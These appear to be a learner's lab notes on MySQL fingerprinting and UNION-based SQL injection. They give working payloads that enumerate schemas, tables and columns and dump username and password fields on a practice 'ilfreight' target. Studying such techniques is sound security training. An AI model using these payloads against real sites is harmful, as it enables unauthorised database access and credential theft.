11 - DB Enumeration

- Before enumerating the database, we usually need to identify the type of DBMS we are dealing with - This is because each DBMS has different queries, and knowing what it is will help us know what queries to use - Initial educated guess: - If the webserver we see in HTTP responses is `Apache` or `Nginx`, it is a good guess that the webserver is running on Linux, so the DBMS is likely `MySQL` - Same logic applies to Microsoft DBMS if the webserver is `IIS`, so it is likely to be `MSSQL` # MySQL Fingerprinting - The following queries and their output will tell us that we are dealing with `MySQL`: |Payload|When to Use|Expected Output|Wrong Output| |---|---|---|---| |`SELECT @@version`|When we have full query output|MySQL Version 'i.e. `10.3.22-MariaDB-1ubuntu1`'|In MSSQL it returns MSSQL version. Error with other DBMS.| |`SELECT POW(1,1)`|When we only have numeric output|`1`|Error with other DBMS| |`SELECT SLEEP(5)`|Blind/No Output|Delays page response for 5 seconds and returns `0`.|Will not delay response with other DBMS| ## Schemata - The table [SCHEMATA](https://dev.mysql.com/doc/refman/8.0/en/information-schema-schemata-table.html) in the `INFORMATION_SCHEMA` database contains information about all databases on the server - This us used to obtain database names so we can then query them - The `SCHEMA_NAME` column contains all the database names currently present ```mysql mysql> SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA; +--------------------+ | SCHEMA_NAME | +--------------------+ | mysql | | information_schema | | performance_schema | | ilfreight | | dev | +--------------------+ 6 rows in set (0.01 sec) ``` - NOTE: The first three databases above are default MySQL databases and are present on any server, so we usually ignore them during DB enumeration - Sometimes there's a fourth `sys` DB as well - We can use a `UNION` injection and the below payload to enumerate db names ```mysql cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- - ``` ![[images/Pasted image 20251204143343.png]] - Now we can determine which database the web app is running to retrieve ports data from - We can find the current db with the below payload using the `database()` in the query ```mysql cn' UNION select 1,database(),2,3-- - ``` ![[images/Pasted image 20251204143458.png]] ## TABLES - Before we dump data from the `dev` database, we need to get a list of the tables to query them with a `SELECT` statement - To find all tables within a database, we can use the `TABLES` table in the `INFORMATION_SCHEMA` db - The [TABLES](https://dev.mysql.com/doc/refman/8.0/en/information-schema-tables-table.html) table contains information about all tables throughout the database - This table contains multiple columns, but we are interested in the `TABLE_SCHEMA` and `TABLE_NAME` columns - The `TABLE_NAME` column stores table names, while the `TABLE_SCHEMA` column points to the database each table belongs to - We can use a `UNION` injection and the below payload to enumerate table names for the `dev` db ```mysql cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- - ``` ![[images/Pasted image 20251204143650.png]] ## COLUMNS - The [COLUMNS](https://dev.mysql.com/doc/refman/8.0/en/information-schema-columns-table.html) table contains information about all columns present in all the databases - This helps us find the column names to query a table for - The `COLUMN_NAME`, `TABLE_NAME`, and `TABLE_SCHEMA` columns can be used to achieve this - We can use a `UNION` injection and the below payload to enumerate column names for the `credentials` table ```mysql cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- - ``` ![[images/Pasted image 20251204143826.png]] ## DATA - After enumerating the dbs and tables, we can form our `UNION` query to dump data of the `username` and `password` columns from the `credentials` table in the `dev` database - See the below payload - NOTE: Do NOT forget to use the dot operator to refer to the `credentials` in the `dev` database, as the web app is running in the `ilfreight` db, as previously discussed ```mysql cn' UNION select 1, username, password, 4 from dev.credentials-- - ``` ![[images/Pasted image 20251204144006.png]] # Exercise - Enumerate dbs with below payload ```mysql cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- - ``` ![[images/Pasted image 20251204144917.png]] - Enumerate tables within `ilfreight` db with below payload ```mysql cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='ilfreight'-- - ``` ![[images/Pasted image 20251204144939.png]] - Enumerate columns within `users` table with below payload ```mysql cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='users'-- - ``` ![[images/Pasted image 20251204145039.png]] - Pull data from `ilfreght.users` table with below payload ```mysql cn' UNION select 1, username, password, 4 from ilfreight.users-- - ``` ![[images/Pasted image 20251204145135.png]]